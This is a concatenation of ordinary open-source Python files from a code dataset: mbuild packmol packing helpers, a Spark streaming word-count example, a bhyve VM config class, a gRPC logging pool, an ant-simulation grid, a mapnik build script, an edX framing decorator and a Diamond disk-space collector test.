msg = ("`compound` and `n_compounds` must be of equal length.")
raise ValueError(msg)
if density is not None:
if box is None and n_compounds is not None:
total_mass = np.sum([n*np.sum([a.mass for a in c.to_parmed().atoms])
for c,n in zip(compound, n_compounds)])
# Conversion from (amu/(kg/m^3))**(1/3) to nm
L = (total_mass/density)**(1/3)*1.1841763
if aspect_ratio is None:
box = _validate_box(Box(3*[L]))
else:
L *= np.prod(aspect_ratio) ** (-1/3)
box = _validate_box(Box([val*L for val in aspect_ratio]))
if n_compounds is None and box is not None:
if len(compound) == 1:
compound_mass = np.sum([a.mass for a in compound[0].to_parmed().atoms])
# Conversion from kg/m^3 / amu * nm^3 to dimensionless units
n_compounds = [int(density/compound_mass*np.prod(box.lengths)*.60224)]
else:
if compound_ratio is None:
msg = ("Determing `n_compounds` from `density` and `box` "
"for systems with more than one compound type requires"
"`compound_ratio`")
raise ValueError(msg)
if len(compound) != len(compound_ratio):
msg = ("Length of `compound_ratio` must equal length of "
"`compound`")
raise ValueError(msg)
prototype_mass = 0
for c, r in zip(compound, compound_ratio):
prototype_mass += r * np.sum([a.mass for a in c.to_parmed().atoms])
# Conversion from kg/m^3 / amu * nm^3 to dimensionless units
n_prototypes = int(density/prototype_mass*np.prod(box.lengths)*.60224)
n_compounds = list()
for c in compound_ratio:
n_compounds.append(int(n_prototypes * c))
# In angstroms for packmol.
box_mins = box.mins * 10
box_maxs = box.maxs * 10
overlap *= 10
# Apply edge buffer
box_maxs -= edge * 10
# Build the input file for each compound and call packmol.
filled_pdb = tempfile.mkstemp(suffix='.pdb')[1]
input_text = PACKMOL_HEADER.format(overlap, filled_pdb, seed)
for comp, m_compounds in zip(compound, n_compounds):
m_compounds = int(m_compounds)
compound_pdb = tempfile.mkstemp(suffix='.pdb')[1]
comp.save(compound_pdb, overwrite=True)
input_text += PACKMOL_BOX.format(compound_pdb, m_compounds,
box_mins[0], box_mins[1], box_mins[2],
box_maxs[0], box_maxs[1], box_maxs[2])
_run_packmol(input_text, filled_pdb, temp_file)
# Create the topology and update the coordinates.
filled = Compound()
for comp, m_compounds in zip(compound, n_compounds):
for _ in range(m_compounds):
filled.add(clone(comp))
filled.update_coordinates(filled_pdb)
filled.periodicity = np.asarray(box.lengths, dtype=np.float32)
return filled
def fill_region(compound, n_compounds, region, overlap=0.2,
seed=12345, edge=0.2, temp_file=None):
"""Fill a region of a box with a compound using packmol.
Parameters
----------
compound : mb.Compound or list of mb.Compound
Compound or list of compounds to be put in region.
n_compounds : int or list of int
Number of compounds to be put in region.
region : mb.Box or list of mb.Box
Region to be filled by compounds.
overlap : float, units nm, default=0.2
Minimum separation between atoms of different molecules.
seed : int, default=12345
Random seed to be passed to PACKMOL.
edge : float, units nm, default=0.2
Buffer at the edge of the region to not place molecules. This is
necessary in some systems because PACKMOL does not account for
periodic boundary conditions in its optimization.
temp_file : str, default=None
File name to write PACKMOL's raw output to.
Returns
-------
filled : mb.Compound
If using mulitple regions and compounds, the nth value in each list are used in order.
For example, if the third compound will be put in the third region using the third value in n_compounds.
"""
_check_packmol(PACKMOL)
if not isinstance(compound, (list, set)):
compound = [compound]
if not isinstance(n_compounds, (list, set)):
n_compounds = [n_compounds]
if compound is not None and n_compounds is not None:
if len(compound) != len(n_compounds):
msg = ("`compound` and `n_compounds` must be of equal length.")
raise ValueError(msg)
# See if region is a single region or list
if isinstance(region, Box): # Cannot iterate over boxes
region = [region]
elif not any(isinstance(reg, (list, set, Box)) for reg in region):
region = [region]
region = [_validate_box(reg) for reg in region]
# In angstroms for packmol.
overlap *= 10
# Build the input file and call packmol.
filled_pdb = tempfile.mkstemp(suffix='.pdb')[1]
input_text = PACKMOL_HEADER.format(overlap, filled_pdb, seed)
for comp, m_compounds, reg in zip(compound, n_compounds, region):
m_compounds = int(m_compounds)
compound_pdb = tempfile.mkstemp(suffix='.pdb')[1]
comp.save(compound_pdb, overwrite=True)
reg_mins = reg.mins * 10
reg_maxs = reg.maxs * 10
reg_maxs -= edge * 10 # Apply edge buffer
input_text += PACKMOL_BOX.format(compound_pdb, m_compounds,
reg_mins[0], reg_mins[1], reg_mins[2],
reg_maxs[0], reg_maxs[1], reg_maxs[2])
_run_packmol(input_text, filled_pdb, temp_file)
# Create the topology and update the coordinates.
filled = Compound()
for comp, m_compounds in zip(compound, n_compounds):
for _ in range(m_compounds):
filled.add(clone(comp))
filled.update_coordinates(filled_pdb)
return filled
def solvate(solute, solvent, n_solvent, box, overlap=0.2,
seed=12345, edge=0.2, temp_file=None):
"""Solvate a compound in a box of solvent using packmol.
Parameters
----------
solute : mb.Compound
Compound to be placed in a box and solvated.
solvent : mb.Compound
Compound to solvate the box.
n_solvent : int
Number of solvents to be put in box.
box : mb.Box
Box to be filled by compounds.
overlap : float, units nm, default=0.2
Minimum separation between atoms of different molecules.
seed : int, default=12345
Random seed to be passed to PACKMOL.
edge : float, units nm, default=0.2
Buffer at the edge of the box to not place molecules. This is necessary
in some systems because PACKMOL does not account for periodic boundary
conditions in its optimization.
temp_file : str, default=None
File name to write PACKMOL's raw output to.
Returns
-------
solvated : mb.Compound
"""
_check_packmol(PACKMOL)
box = _validate_box(box)
if not isinstance(solvent, (list, set)):
solvent = [solvent]
if not isinstance(n_solvent, (list, set)):
n_solvent = [n_solvent]
if len(solvent) != len(n_solvent):
msg = ("`n_solvent` and `n_solvent` must be of equal length.")
raise ValueError(msg)
# In angstroms for packmol.
box_mins = box.mins * 10
box_maxs = box.maxs * 10
overlap *= 10
center_solute = (box_maxs + box_mins) / 2
# Apply edge buffer
box_maxs -= edge * 10
# Build the input file for each compound and call packmol.
solvated_pdb = tempfile.mkstemp(suffix='.pdb')[1]
solute_pdb = tempfile.mkstemp(suffix='.pdb')[1]
solute.save(solute_pdb, overwrite=True)
input_text = (PACKMOL_HEADER.format(overlap, solvated_pdb, seed) +
PACKMOL_SOLUTE.format(solute_pdb, *center_solute))
for solv, m_solvent in zip(solvent, n_solvent):
m_solvent = int(m_solvent)
solvent_pdb = tempfile.mkstemp(suffix='.pdb')[1]
solv.save(solvent_pdb, overwrite=True)
input_text += PACKMOL_BOX.format(solvent_pdb, m_solvent,
box_mins[0], box_mins[1], box_mins[2],
box_maxs[0], box_maxs[1], box_maxs[2])
_run_packmol(input_text, solvated_pdb, temp_file)
# Create the topology and update the coordinates.
solvated = Compound()
solvated.add(solute)
for solv, m_solvent in zip(solvent, n_solvent):
for _ in range(m_solvent):
solvated.add(clone(solv))
solvated.update_coordinates(solvated_pdb)
return solvated
def _validate_box(box):
if isinstance(box, (list, tuple)):
if len(box) == 3:
box = Box(lengths=box)
elif len(box) == 6:
box = Box(mins=box[:3], maxs=box[3:])
if not isinstance(box, Box):
raise MBuildError('Unknown format for `box` parameter. Must pass a'
' list/tuple of length 3 (box lengths) or length'
' 6 (box mins and maxes) or an mbuild.Box object.')
return box
def _packmol_error(out, err):
"""Log packmol output to files. """
with open('log.txt', 'w') as log_file, open('err.txt', 'w') as err_file:
log_file.write(out)
err_file.write(err)
raise RuntimeError("PACKMOL failed. See 'err.txt' and 'log.txt'")
def _run_packmol(input_text, filled_pdb, temp_file):
proc = Popen(PACKMOL, stdin=PIPE, stdout=PIPE, stderr=PIPE, universal_newlines=True)
out, err = proc.communicate(input=input_text)
if 'WITHOUT PERFECT PACKING' in out:
msg = ("Packmol finished with imperfect packing. Using "
"the .pdb_FORCED file instead. This may not be a "
"sufficient packing result.")
warnings.warn(msg)
os.system('cp {0}_FORCED {0}'.format(filled_pdb))
if 'ERROR' in out:
_packmol_error(out, err)
if temp_file is not None:
os.system('cp {0} {1}'.format(filled_pdb, os.path.join(temp_file)))
def _check_packmol(PACKMOL):
if not PACKMOL:
msg = "Packmol not found."
if sys.platform.startswith("win"):
msg = (msg + " If packmol is already installed, make sure that the "
"packmol.exe is on the path.")
raise IOError(msg)
| mit | -2,805,964,307,335,604,000 | 36.396867 | 108 | 0.611324 | false |
bravo-zhang/spark | examples/src/main/python/sql/streaming/structured_network_wordcount.py | 51 | 2539 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
r"""
Counts words in UTF8 encoded, '\n' delimited text received from the network.
Usage: structured_network_wordcount.py <hostname> <port>
<hostname> and <port> describe the TCP server that Structured Streaming
would connect to receive data.
To run this on your local machine, you need to first run a Netcat server
`$ nc -lk 9999`
and then run the example
`$ bin/spark-submit examples/src/main/python/sql/streaming/structured_network_wordcount.py
localhost 9999`
"""
from __future__ import print_function
import sys
from pyspark.sql import SparkSession
from pyspark.sql.functions import explode
from pyspark.sql.functions import split
if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: structured_network_wordcount.py <hostname> <port>", file=sys.stderr)
sys.exit(-1)
host = sys.argv[1]
port = int(sys.argv[2])
spark = SparkSession\
.builder\
.appName("StructuredNetworkWordCount")\
.getOrCreate()
# Create DataFrame representing the stream of input lines from connection to host:port
lines = spark\
.readStream\
.format('socket')\
.option('host', host)\
.option('port', port)\
.load()
# Split the lines into words
words = lines.select(
# explode turns each item in an array into a separate row
explode(
split(lines.value, ' ')
).alias('word')
)
# Generate running word count
wordCounts = words.groupBy('word').count()
# Start running the query that prints the running counts to the console
query = wordCounts\
.writeStream\
.outputMode('complete')\
.format('console')\
.start()
query.awaitTermination()
| apache-2.0 | 7,066,528,901,242,410,000 | 31.974026 | 94 | 0.686885 | false |
ConnorDillon/bhyve | bhyve/config.py | 1 | 2053 | import os
import copy
from .utils import flatmap
from .serializable import Serializable
from .vm import VM
class Config(Serializable):
def __init__(self, vms):
self.vms = vms
self.file = ''
def add(self, vm):
self.vms[vm.name] = vm
return self
def remove(self, vm_name):
del self.vms[vm_name]
return self
def modify(self, vm):
return self.add(vm)
def get(self, vm_name):
return self.vms[vm_name]
def clone(self, source, name):
vm = copy.deepcopy(self.get(source))
vm.name = name
vm.nmdm_id = self.new_nmdmid()
tapid = self.new_tapid()
for nic in vm.nics:
nic.name = 'tap' + str(tapid)
tapid += 1
cmds = []
for disk in vm.disks:
new_name = disk.name.replace(source, name)
for cmd in disk.clone(new_name):
cmds.append(cmd)
disk.name = new_name
self.add(vm)
return cmds
def to_dict(self):
dct = {}
for k, v in self.vms.items():
dct[k] = v.to_dict()
del dct[k]['name']
return dct
@classmethod
def from_dict(cls, dct):
if dct is None:
dct = {}
vms = {}
for k, v in dct.items():
v['name'] = k
vms[k] = VM.from_dict(v)
return cls(vms)
@classmethod
def open(cls, config_file):
if os.path.exists(config_file):
with open(config_file) as cf:
config = cls.load(cf.read())
else:
config = cls.from_dict({})
config.file = config_file
return config
def save(self):
assert self.file
with open(self.file, 'w') as cf:
cf.write(self.dump())
def new_tapid(self):
max_id = max(map(lambda x: int(x.name[3:]), flatmap(lambda x: x.nics, self.vms.values())))
return max_id + 1
def new_nmdmid(self):
return max(vm.nmdm_id for vm in self.vms.values()) + 1 | gpl-3.0 | -4,245,439,619,576,110,600 | 22.883721 | 98 | 0.514856 | false |
greasypizza/grpc | src/python/grpcio/grpc/framework/foundation/logging_pool.py | 6 | 3194 | # Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""A thread pool that logs exceptions raised by tasks executed within it."""
import logging
from concurrent import futures
def _wrap(behavior):
"""Wraps an arbitrary callable behavior in exception-logging."""
def _wrapping(*args, **kwargs):
try:
return behavior(*args, **kwargs)
except Exception as e:
logging.exception(
'Unexpected exception from %s executed in logging pool!',
behavior)
raise
return _wrapping
class _LoggingPool(object):
"""An exception-logging futures.ThreadPoolExecutor-compatible thread pool."""
def __init__(self, backing_pool):
self._backing_pool = backing_pool
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._backing_pool.shutdown(wait=True)
def submit(self, fn, *args, **kwargs):
return self._backing_pool.submit(_wrap(fn), *args, **kwargs)
def map(self, func, *iterables, **kwargs):
return self._backing_pool.map(_wrap(func),
*iterables,
timeout=kwargs.get('timeout', None))
def shutdown(self, wait=True):
self._backing_pool.shutdown(wait=wait)
def pool(max_workers):
"""Creates a thread pool that logs exceptions raised by the tasks within it.
Args:
max_workers: The maximum number of worker threads to allow the pool.
Returns:
A futures.ThreadPoolExecutor-compatible thread pool that logs exceptions
raised by the tasks executed within it.
"""
return _LoggingPool(futures.ThreadPoolExecutor(max_workers))
| bsd-3-clause | 5,036,194,065,998,722,000 | 36.576471 | 81 | 0.700689 | false |
Antificial/antificial | antificial/framework/world.py | 1 | 13417 | #! /usr/bin/env python
from multiprocessing import Array
import util
from random import randint
from enum import Enum
from framework import PheromoneType
class Field:
def __init__(self, x, y, is_nest, ant_count, home_pheromone_level, food_pheromone_level, player_food_levels):
self.x = x
self.y = y
self.is_nest = is_nest
self.ant_count = ant_count
self.home_pheromone_level = home_pheromone_level
self.food_pheromone_level = food_pheromone_level
self.player_food_levels = player_food_levels
def __str__(self):
output = "["
if self.x < 10:
output += "x: " + str(self.x)
elif self.x < 100:
output += "x: " + str(self.x)
else:
output += "x:" + str(self.x)
output += " "
if self.y < 10:
output += "y: " + str(self.y)
elif self.y < 100:
output += "y: " + str(self.y)
else:
output += "y:" + str(self.y)
if self.is_nest > 0:
output += " N"
if self.ant_count > 0:
output += " A:" + str(self.ant_count)
if self.home_pheromone_level > 0:
output += " H:" + str(self.home_pheromone_level)
if self.food_pheromone_level > 0:
output += " F:" + str(self.food_pheromone_level)
for index in range(len(self.player_food_levels)):
if (self.player_food_levels[index] > 0):
output += " P" + str(index) + ":" + str(self.player_food_levels[index])
output += "]"
return output
def __repr__(self):
return self.__str__()
def __eq__(self, other):
if other is None:
return False
if not isinstance(other, Field):
return False
if self.x != other.x or self.y != other.y:
return False
if self.is_nest != other.is_nest:
return False
if self.ant_count != other.ant_count:
return False
if self.home_pheromone_level != other.home_pheromone_level:
return False
if self.food_pheromone_level != other.food_pheromone_level:
return False
if len(self.player_food_levels) != len(other.player_food_levels):
return False
for index in range(len(self.player_food_levels)):
if self.player_food_levels[index] != other.player_food_levels[index]:
return False
return True
class World:
def __init__(self, grid_resolution, player_count):
self.width = grid_resolution[0]
self.height = grid_resolution[1]
self.player_count = player_count
# keep track of the food coordinates (x, y, player_no) to make the updates easier
self.food_coordinates = []
"""Amount of integers per coordinate:
1 to flag the nest (values: 0 - 1)
1 for the ant count (values: 0 - max int)
1 for home pheromone level (values: 0 - 100)
1 for food pheromone level (values: 0 - 100)
1 food flag / level per player (values: 0 - 1)
"""
self.ints_per_coordinate = 4 + self.player_count
# index (position) of integers
self.nest_index = 0
self.ant_count_index = 1
self.home_pheromone_index = 2
self.food_pheromone_index = 3
self.player_food_indexes = range(4, 4 + self.player_count)
self.array_size = self.width * self.height * self.ints_per_coordinate
self.data = Array('i', [0 for i in range(self.array_size)], lock=False)
def get(self, x, y):
if not self.is_valid_coordinate(x, y):
return None
begin_index = self.get_field_begin_index(x, y)
is_nest = self.data[begin_index + self.nest_index]
ant_count = self.data[begin_index + self.ant_count_index]
home_pheromone_level = self.data[begin_index + self.home_pheromone_index]
food_pheromone_level = self.data[begin_index + self.food_pheromone_index]
player_food_levels = []
for food_index in self.player_food_indexes:
player_food_levels.append(self.data[begin_index + food_index])
field = Field(x, y, is_nest, ant_count, home_pheromone_level, food_pheromone_level, player_food_levels)
return field
def set(self, field):
if (not isinstance(field, Field)):
return False
if not self.is_valid_coordinate(field.x, field.y):
return False
if (len(field.player_food_levels) != self.player_count):
return False
begin_index = self.get_field_begin_index(field.x, field.y)
self.data[begin_index + self.nest_index] = field.is_nest
self.data[begin_index + self.ant_count_index] = field.ant_count
self.data[begin_index + self.home_pheromone_index] = field.home_pheromone_level
self.data[begin_index + self.food_pheromone_index] = field.food_pheromone_level
for player_no in range(self.player_count):
food_index = self.player_food_indexes[player_no]
self.data[begin_index + food_index] = field.player_food_levels[player_no]
if field.player_food_levels[player_no] > 0:
self.food_coordinates.append([field.x, field.y, player_no])
return True
def reset(self):
self.food_coordinates = []
for index in range(self.array_size):
self.data[index] = 0
"""Creates a matrix of fields depending on the smell_range.
Borders are represented as "None".
Examples:
smell_range = 1 -> result = [
[Field, Field, Field],
[Field, AntF., Field],
[Field, Field, Field]
]
smell_range = 2 -> result = [
[Field, Field, Field, Field, Field],
[Field, Field, Field, Field, Field],
[Field, Field, AntF., Field, Field],
[Field, Field, Field, Field, Field],
[Field, Field, Field, Field, Field]
]
smell_range = 3 -> result = [
[Field, Field, Field, Field, Field, Field, Field],
[Field, Field, Field, Field, Field, Field, Field],
[Field, Field, Field, Field, Field, Field, Field],
[Field, Field, Field, AntF., Field, Field, Field],
[Field, Field, Field, Field, Field, Field, Field],
[Field, Field, Field, Field, Field, Field, Field],
[Field, Field, Field, Field, Field, Field, Field]
]
"""
def get_neighbours(self, x, y, smell_range = 1):
if not self.is_valid_coordinate(x, y):
return None
if smell_range < 1:
return None
# be careful: min and max values can and will be outside of our coordinate system
min_x = x - smell_range
min_y = y - smell_range
max_x = x + smell_range
max_y = y + smell_range
neighbours_width = 1 + (2 * smell_range)
result = [[None for y in range(neighbours_width)] for x in range(neighbours_width)]
for current_x in range(min_x, max_x + 1):
if current_x < 0 or current_x >= self.width:
continue
for current_y in range(min_y, max_y + 1):
if current_y < 0 or current_y >= self.height:
continue
result[current_x - min_x][current_y - min_y] = self.get(current_x, current_y)
return result
def deposit_pheromone(self, x, y, pheromone_type, pheromone_strength):
if not self.is_valid_coordinate(x, y):
return False
if pheromone_strength < 0:
return False
begin_index = self.get_field_begin_index(x, y)
if pheromone_type == PheromoneType.HOME:
current_level = self.data[begin_index + self.home_pheromone_index]
new_level = current_level + pheromone_strength
if new_level > 255:
new_level = 255
self.data[begin_index + self.home_pheromone_index] = new_level
elif pheromone_type == PheromoneType.FOOD:
current_level = self.data[begin_index + self.food_pheromone_index]
new_level = current_level + pheromone_strength
if new_level > 255:
new_level = 255
self.data[begin_index + self.food_pheromone_index] = new_level
else:
return False
return True
def decay_pheromones(self, home_pheromone_decay_rate = 8, food_pheromone_decay_rate = 8):
if home_pheromone_decay_rate < 0:
return False
if food_pheromone_decay_rate < 0:
return False
for x in range(self.width):
for y in range(self.height):
begin_index = self.get_field_begin_index(x, y)
# update home pheromone level
current_level = self.data[begin_index + self.home_pheromone_index]
if current_level > 0:
updated_level = current_level - home_pheromone_decay_rate
if updated_level < 0:
updated_level = 0
self.data[begin_index + self.home_pheromone_index] = updated_level
# update food pheromone level
current_level = self.data[begin_index + self.food_pheromone_index]
if current_level > 0:
updated_level = current_level - food_pheromone_decay_rate
if updated_level < 0:
updated_level = 0
self.data[begin_index + self.food_pheromone_index] = updated_level
return True
# TOOD: replace x and y by Ant / Field objects?
def move_ant(self, source_x, source_y, destination_x, destination_y):
if not self.is_valid_coordinate(source_x, source_y):
return False
if not self.is_valid_coordinate(destination_x, destination_y):
return False
if source_x == destination_x and source_y == destination_y:
return True
# decrease ant count in source field
source_begin_index = self.get_field_begin_index(source_x, source_y)
ant_count = self.data[source_begin_index + self.ant_count_index]
if ant_count > 0:
self.data[source_begin_index + self.ant_count_index] = ant_count - 1
# increase ant count in destination field
destination_begin_index = self.get_field_begin_index(destination_x, destination_y)
ant_count = self.data[destination_begin_index + self.ant_count_index]
self.data[destination_begin_index + self.ant_count_index] = ant_count + 1
return True
def update_food(self, new_food_coordinates):
# remove old food levels
for (x, y, player_no) in self.food_coordinates:
if not self.is_valid_coordinate(x, y):
continue
begin_index = self.get_field_begin_index(x, y)
food_index = self.player_food_indexes[player_no]
self.data[begin_index + food_index] = 0
# set new food levels
self.food_coordinates = new_food_coordinates
for (x, y, player_no) in new_food_coordinates:
if not self.is_valid_coordinate(x, y):
continue
begin_index = self.get_field_begin_index(x, y)
food_index = self.player_food_indexes[player_no]
self.data[begin_index + food_index] = 255
def set_home(self, x, y):
begin_index = self.get_field_begin_index(x, y)
self.data[begin_index + self.nest_index] = 1
def get_field_begin_index(self, x, y):
if not self.is_valid_coordinate(x, y):
return None
return (x + (y * self.width)) * self.ints_per_coordinate
def is_valid_coordinate(self, x, y):
if x < 0 or x >= self.width:
return False
if y < 0 or y >= self.height:
return False
return True
def iprint(self):
util.iprint("[World] width: {self.width}")
util.iprint("[World] height: {self.height}")
util.iprint("[World] player_count: {self.player_count}")
util.iprint("[World] ints_per_coordinate: {self.ints_per_coordinate}")
util.iprint("[World] nest_index: {self.nest_index}")
util.iprint("[World] ant_count_index: {self.ant_count_index}")
util.iprint("[World] home_pheromone_index: {self.home_pheromone_index}")
util.iprint("[World] food_pheromone_index: {self.food_pheromone_index}")
util.iprint("[World] player_food_indexes: {self.player_food_indexes}")
util.iprint("[World] data:")
output = ""
for x in range(self.width):
for y in range(self.height):
field = self.get(x, y)
output += str(field)
output += "\n"
util.iprint(output) | mit | -591,269,150,169,951,500 | 36.066298 | 113 | 0.548036 | false |
strk/mapnik | tests/cpp_tests/build.py | 2 | 1430 | import os
import glob
from copy import copy
Import ('env')
test_env = env.Clone()
test_env['LIBS'] = copy(env['LIBMAPNIK_LIBS'])
test_env.AppendUnique(LIBS='mapnik')
test_env.AppendUnique(LIBS='sqlite3')
test_env.AppendUnique(CXXFLAGS='-g')
for cpp_test in glob.glob('*_test.cpp'):
name = cpp_test.replace('.cpp','-bin')
source_files = [cpp_test]
test_program = None
if 'agg_blend_src_over_test' in cpp_test:
# customization here for faster compile
agg_env = Environment(ENV=os.environ)
agg_env['CXX'] = env['CXX']
agg_env['CXXFLAGS'] = env['CXXFLAGS']
if 'agg' in test_env['LIBS']:
agg_env.AppendUnique(LIBS='agg')
agg_env.Append(CPPPATH = '#deps/agg/include')
agg_env.Append(LIBPATH = '#deps/agg')
agg_env['CPPPATH'] = ['#deps/agg/include',env['BOOST_INCLUDES']]
test_program = agg_env.Program(name, source=source_files, LINKFLAGS=env['CUSTOM_LDFLAGS'])
else:
test_env_local = test_env.Clone()
if 'csv_parse' in cpp_test:
source_files += glob.glob('../../plugins/input/csv/' + '*.cpp')
test_program = test_env_local.Program(name, source=source_files, LINKFLAGS=env['CUSTOM_LDFLAGS'])
Depends(test_program, env.subst('../../src/%s' % env['MAPNIK_LIB_NAME']))
# build locally if installing
if 'install' in COMMAND_LINE_TARGETS:
env.Alias('install',test_program)
| lgpl-2.1 | -877,316,198,166,355,200 | 37.648649 | 105 | 0.625175 | false |
AnhellO/DAS_Sistemas | Ago-Dic-2020/rodriguez-martinez-jesus-angel/primer-parcial/builder.py | 1 | 1125 | # Abstract Building
class Pizza:
def __init__(self, inches):
self.ingredients = ["salsa de tomate", "queso"]
self.inches = inches
def __str__(self):
message = f'Mi pizza es de {self.inches}" con los siguientes ingredientes: ' + ', '.join(self.ingredients)
# Replace the last comma with "y"
last_comma = message.rfind(",")
return message[:last_comma] + " y" + message[last_comma+1:]
# Builder.
class PizzaBuilder:
def __init__(self, inches: int):
self.pizza = Pizza(inches)
def addCheese(self):
self.pizza.ingredients.append('doble queso')
return self
def addPepperoni(self):
self.pizza.ingredients.append('pepperoni')
return self
def addSalami(self):
self.pizza.ingredients.append('salami')
return self
def addPimientos(self):
self.pizza.ingredients.append('pimientos')
return self
def addCebolla(self):
self.pizza.ingredients.append('cebolla')
return self
def addChampiñones(self):
self.pizza.ingredients.append('champiñones')
return self
def build(self):
return self.pizza | mit | 5,899,140,755,982,430,000 | 31.114286 | 110 | 0.650045 | false |
BehavioralInsightsTeam/edx-platform | common/djangoapps/third_party_auth/decorators.py | 14 | 1358 | """
Decorators that can be used to interact with third_party_auth.
"""
from functools import wraps
from django.conf import settings
from django.shortcuts import redirect
from django.utils.decorators import available_attrs
from six.moves.urllib.parse import urlencode, urlparse
from third_party_auth.models import LTIProviderConfig
from third_party_auth.provider import Registry
def xframe_allow_whitelisted(view_func):
"""
Modifies a view function so that its response has the X-Frame-Options HTTP header
set to 'DENY' if the request HTTP referrer is not from a whitelisted hostname.
"""
def wrapped_view(request, *args, **kwargs):
""" Modify the response with the correct X-Frame-Options. """
resp = view_func(request, *args, **kwargs)
x_frame_option = 'DENY'
if settings.FEATURES['ENABLE_THIRD_PARTY_AUTH']:
referer = request.META.get('HTTP_REFERER')
if referer is not None:
parsed_url = urlparse(referer)
hostname = parsed_url.hostname
if LTIProviderConfig.objects.current_set().filter(lti_hostname=hostname, enabled=True).exists():
x_frame_option = 'ALLOW'
resp['X-Frame-Options'] = x_frame_option
return resp
return wraps(view_func, assigned=available_attrs(view_func))(wrapped_view)
| agpl-3.0 | -6,572,996,483,951,134,000 | 38.941176 | 112 | 0.682622 | false |
ramjothikumar/Diamond | src/collectors/diskspace/test/testdiskspace.py | 18 | 4782 | #!/usr/bin/python
# coding=utf-8
##########################################################################
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from test import run_only
from mock import Mock
from mock import patch
from diamond.collector import Collector
from diskspace import DiskSpaceCollector
##########################################################################
def run_only_if_major_is_available(func):
try:
import os
os.major
major = True
except AttributeError:
major = None
pred = lambda: major is not None
return run_only(func, pred)
class TestDiskSpaceCollector(CollectorTestCase):
def setUp(self):
config = get_collector_config('DiskSpaceCollector', {
'interval': 10,
'byte_unit': ['gigabyte'],
'exclude_filters': [
'^/export/home',
'^/tmpfs',
]
})
self.collector = DiskSpaceCollector(config, None)
def test_import(self):
self.assertTrue(DiskSpaceCollector)
@run_only_if_major_is_available
@patch('os.access', Mock(return_value=True))
def test_get_file_systems(self):
result = None
os_stat_mock = patch('os.stat')
os_major_mock = patch('os.major')
os_minor_mock = patch('os.minor')
os_realpath_mock = patch('os.path.realpath')
open_mock = patch('__builtin__.open',
Mock(return_value=self.getFixture('proc_mounts')))
stat_mock = os_stat_mock.start()
stat_mock.return_value.st_dev = 42
major_mock = os_major_mock.start()
major_mock.return_value = 9
minor_mock = os_minor_mock.start()
minor_mock.return_value = 0
realpath_mock = os_realpath_mock.start()
realpath_mock.return_value = '/dev/sda1'
omock = open_mock.start()
result = self.collector.get_file_systems()
os_stat_mock.stop()
os_major_mock.stop()
os_minor_mock.stop()
os_realpath_mock.stop()
open_mock.stop()
stat_mock.assert_called_once_with('/')
major_mock.assert_called_once_with(42)
minor_mock.assert_called_once_with(42)
realpath_mock.assert_called_once_with(
'/dev/disk/by-uuid/81969733-a724-4651-9cf5-64970f86daba')
self.assertEqual(result, {
(9, 0): {
'device':
'/dev/sda1',
'fs_type': 'ext3',
'mount_point': '/'}
})
omock.assert_called_once_with('/proc/mounts')
return result
@run_only_if_major_is_available
@patch('os.access', Mock(return_value=True))
@patch.object(Collector, 'publish')
def test_should_work_with_real_data(self, publish_mock):
statvfs_mock = Mock()
statvfs_mock.f_bsize = 4096
statvfs_mock.f_frsize = 4096
statvfs_mock.f_blocks = 360540255
statvfs_mock.f_bfree = 285953527
statvfs_mock.f_bavail = 267639130
statvfs_mock.f_files = 91578368
statvfs_mock.f_ffree = 91229495
statvfs_mock.f_favail = 91229495
statvfs_mock.f_flag = 4096
statvfs_mock.f_namemax = 255
os_stat_mock = patch('os.stat')
os_major_mock = patch('os.major', Mock(return_value=9))
os_minor_mock = patch('os.minor', Mock(return_value=0))
os_path_isdir_mock = patch('os.path.isdir', Mock(return_value=False))
open_mock = patch('__builtin__.open',
Mock(return_value=self.getFixture('proc_mounts')))
os_statvfs_mock = patch('os.statvfs', Mock(return_value=statvfs_mock))
os_stat_mock.start()
os_major_mock.start()
os_minor_mock.start()
os_path_isdir_mock.start()
open_mock.start()
os_statvfs_mock.start()
self.collector.collect()
os_stat_mock.stop()
os_major_mock.stop()
os_minor_mock.stop()
os_path_isdir_mock.stop()
open_mock.stop()
os_statvfs_mock.stop()
metrics = {
'root.gigabyte_used': (284.525, 2),
'root.gigabyte_free': (1090.826, 2),
'root.gigabyte_avail': (1020.962, 2),
'root.inodes_used': 348873,
'root.inodes_free': 91229495,
'root.inodes_avail': 91229495
}
self.setDocExample(collector=self.collector.__class__.__name__,
metrics=metrics,
defaultpath=self.collector.config['path'])
